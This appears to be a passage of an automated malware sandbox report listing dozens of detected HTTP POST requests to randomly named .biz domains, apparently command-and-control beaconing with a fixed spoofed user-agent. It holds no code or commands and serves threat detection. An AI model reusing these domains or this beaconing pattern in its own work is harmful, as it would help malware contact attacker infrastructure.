                    Source: global trafficHTTP traffic detected: POST /tkvpxcpexicoa HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /bmgwtyy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /ghffopumxhoiq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /bgr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /fafj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /dadmwtnbmefxvi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /wofnqkoxvbvigg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /ccx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /nbnssijhjwmugla HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /hpkejgwwxdp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /pnckkgdjorsjoiow HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /dhyyqtllpdwr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /btnkoeanfymxsstk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /pgakntaoep HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /ihrtfcsj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xlfhhhm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /ywao HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ifsaia.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /hdfj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: saytjshyf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /udjkgjnyfcxmpggx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vcddkls.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /lhiqwpom HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /opshcknhcx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /cmdgaowb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tbjrpv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /ijfjro HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xlfhhhm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /dvsybtnikly HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: deoci.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /kqhlsuvr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ifsaia.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /emkvqhipcuidqkmd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /mqrfuyvbhtbn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /wt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: saytjshyf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /fqwxf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qaynky.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /wxdopk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vcddkls.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /ifsivywgpp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bumxkqgxu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /kui HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /qlejchqklyh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dwrqljrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /fvlqmp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /jmyxny HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tbjrpv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /fshqbiv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nqwjmb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /tipcpxgs HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: deoci.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /qkmbmbtlinurxa HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ytctnunms.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /mhnfavogqkp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /omaxykiwlg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /mggqfmrkiurp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /b HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /elpkfqto HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qaynky.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /mvjuawquor HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oshhkdluh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /y HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /xqvmg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bumxkqgxu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /sltbypkjutmqd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /risgh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dwrqljrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /j HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jpskm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /fvahgnbvglin HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nqwjmb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /xwmumuqawghep HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lrxdmhrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /anxrplnvdvpxn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ytctnunms.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /iytkitpluk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /cngo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wllvnzb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /uwugf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /bvxo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oshhkdluh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /torfbleb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gnqgo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /iqacwcupavovv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /gknotpflubkt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jhvzpcfg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /njk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /ljnnvokac HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: acwjcqqv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /y HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jpskm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /heowijklptfa HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lrxdmhrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /jt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vyome.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /gerofbpnhxbnel HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wllvnzb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /negfyndqat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yauexmxk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
